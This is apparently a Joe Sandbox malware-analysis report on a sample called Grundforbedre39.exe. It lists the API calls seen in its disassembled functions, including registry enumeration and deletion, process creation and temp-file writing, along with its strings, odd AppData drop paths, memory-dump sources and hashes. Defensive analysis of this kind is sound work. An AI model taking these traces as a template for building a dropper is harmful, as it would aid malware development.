                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 982 405c1e-405c2a 983 405c2b-405c5f GetTickCount GetTempFileNameW 982->983 984 405c61-405c63 983->984 985 405c6e-405c70 983->985 984->983 987 405c65 984->987 986 405c68-405c6b 985->986 987->986
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00405C3C
                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403268,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00405C57
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C23
                                                                                      • nsa, xrefs: 00405C2B
                                                                                      • "C:\Users\user\Desktop\Grundforbedre39.exe", xrefs: 00405C1E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: "C:\Users\user\Desktop\Grundforbedre39.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      • API String ID: 1716503409-2103450607
                                                                                      • Opcode ID: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                                                      • Instruction ID: a4e54dcc62cd1b6bfc855809a1f33464b5edbff741e4ba4f72954512b04b2574
                                                                                      • Opcode Fuzzy Hash: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                                                      • Instruction Fuzzy Hash: 58F09076B04204BBEB009F5ADD49ADFB7ACEB91710F10403AF900E7190E2B0AE44CB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                      • String ID:
                                                                                      • API String ID: 1912718029-0
                                                                                      • Opcode ID: fdbde4e884f383338cc21de88dd7407a01aefe671536b7f53bbd552f7ed090ed
                                                                                      • Instruction ID: 13aa261ecf2a86817b53105e55b29f339a5543dfd3ea7b5a0579e289bf8829aa
                                                                                      • Opcode Fuzzy Hash: fdbde4e884f383338cc21de88dd7407a01aefe671536b7f53bbd552f7ed090ed
                                                                                      • Instruction Fuzzy Hash: 04116A71908118FFEF119F90DE8CEAE3B79FB14384F100476FA05A11A0D3B49E52AA69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                      • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                        • Part of subcall function 10002286: GlobalAlloc.KERNEL32(?,00001020), ref: 100022B8
                                                                                        • Part of subcall function 10002645: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                        • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1146159756.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1146123851.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.1146198520.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.1146237766.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1791698881-3916222277
                                                                                      • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                      • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                      • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                      • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                                                      • Instruction ID: a86adb03786c756a90e8c754dee758adf3648459c58847ecf436330ca9d5af9c
                                                                                      • Opcode Fuzzy Hash: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                                                      • Instruction Fuzzy Hash: B121B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A40DB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F11
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F32
                                                                                      • RegCloseKey.ADVAPI32(?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F55
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Call
                                                                                      • API String ID: 3677997916-1824292864
                                                                                      • Opcode ID: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                                                      • Instruction ID: 1229758a71a34d9b3841ebc19c7c3eba7c9bd897b4c963cc492d8629085b1b1e
                                                                                      • Opcode Fuzzy Hash: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                                                      • Instruction Fuzzy Hash: B9011E3255020AEADF21CF55ED09EDB3BA9EF55350F004036F905D6160D335D964DFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                                        • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00403160), ref: 004051D4
                                                                                        • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll), ref: 004051E6
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                                        • Part of subcall function 004056FA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                                                        • Part of subcall function 004056FA: CloseHandle.KERNEL32(?), ref: 00405730
                                                                                      • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E95
                                                                                      • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401EAA
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 3585118688-0
                                                                                      • Opcode ID: 7b08a6d90b05bbed925343c6248fd7a4a37af617971c498a8cfedcd14d37eb6c
                                                                                      • Instruction ID: 19c395d66568059f601410a6cc42e832bf6643a8327f7d33ffb52a85e02cf26d
                                                                                      • Opcode Fuzzy Hash: 7b08a6d90b05bbed925343c6248fd7a4a37af617971c498a8cfedcd14d37eb6c
                                                                                      • Instruction Fuzzy Hash: FF11A131900108EBCF21AFA1CC849DE7A76EB44314F204037F605B61E1C7798E81DB9E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,75B23420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75B23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 00401612
                                                                                        • Part of subcall function 00405648: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilb,?,00000000,?), ref: 00401645
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilb, xrefs: 00401638
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilb
                                                                                      • API String ID: 1892508949-2699030423
                                                                                      • Opcode ID: 50f3ce724175e93cf5c6c72f007c2b38a77747b88a25ec32c8f5577a88bf2d41
                                                                                      • Instruction ID: c4264af60da0efacfc01d1487171d30b62475a562f2de0234080d29f7ac7759b
                                                                                      • Opcode Fuzzy Hash: 50f3ce724175e93cf5c6c72f007c2b38a77747b88a25ec32c8f5577a88bf2d41
                                                                                      • Instruction Fuzzy Hash: 5611B631504504EBCF206FA5CD4199F3AB1EF54368B240A3BF946B61F1D63E4A81DE5E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                                                      • CloseHandle.KERNEL32(?), ref: 00405730
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 0040570D
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: Error launching installer
                                                                                      • API String ID: 3712363035-66219284
                                                                                      • Opcode ID: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                                                      • Instruction ID: 962493b9a5858e12d65c81fa64705238b81a3a8385349ca8c6d0e9dfe3a178e2
                                                                                      • Opcode Fuzzy Hash: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                                                      • Instruction Fuzzy Hash: 55E0BFB4A00209BFEB109F64ED05F7B76BCE714604F804521BE15F6190D7B4A8118A79
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                                                      • Instruction ID: 4318c0865f168c3c39c32caca64743d138ecf2e5224254a141b4117f5842e3e1
                                                                                      • Opcode Fuzzy Hash: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                                                      • Instruction Fuzzy Hash: 6FA14371E00229CBDF28CFA8C854BADBBB1FF44305F15856AD816BB281C7785A96DF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                                                      • Instruction ID: 8bd9da501ed45a7f5d2d0dfc2be718583217048081f6288eced8fd4e99326474
                                                                                      • Opcode Fuzzy Hash: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                                                      • Instruction Fuzzy Hash: D3913370D00229CBDF28CFA8C854BADBBB1FF44305F15812AD816BB291C7795A96CF84
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                                                      • Instruction ID: cc0f6ab454a14bc981dfc54755cdbe6dc6b21fe19783e5e5045ac21e9f873034
                                                                                      • Opcode Fuzzy Hash: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                                                      • Instruction Fuzzy Hash: 57813271E00229CBDB24CFA8C844BADBBB1FF45305F25816AD816BB291C7789A95CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                                                      • Instruction ID: 36932640a45318c75a18aff77ab64511548531c3f0ac059ca6f487157756e1a6
                                                                                      • Opcode Fuzzy Hash: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                                                      • Instruction Fuzzy Hash: DB816831D04229DBDB24CFA8D8447ADBBB0FF44305F15816AE856BB2C0C7785A96CF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                                                                      • Instruction ID: ff2225f7ed94bd6a4cfd13171a87750c77ef90a01ce87bb0bc5953b87d28885c
                                                                                      • Opcode Fuzzy Hash: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                                                                      • Instruction Fuzzy Hash: F3712271E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB281C7795A96DF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                                                                      • Instruction ID: 52dfaafe50a83d16d2aca4474dbfbf9792b45fca5ae70f0232ed595026c100c8
                                                                                      • Opcode Fuzzy Hash: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                                                                      • Instruction Fuzzy Hash: E7713371E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB291C7795A96DF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 00401FEE
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
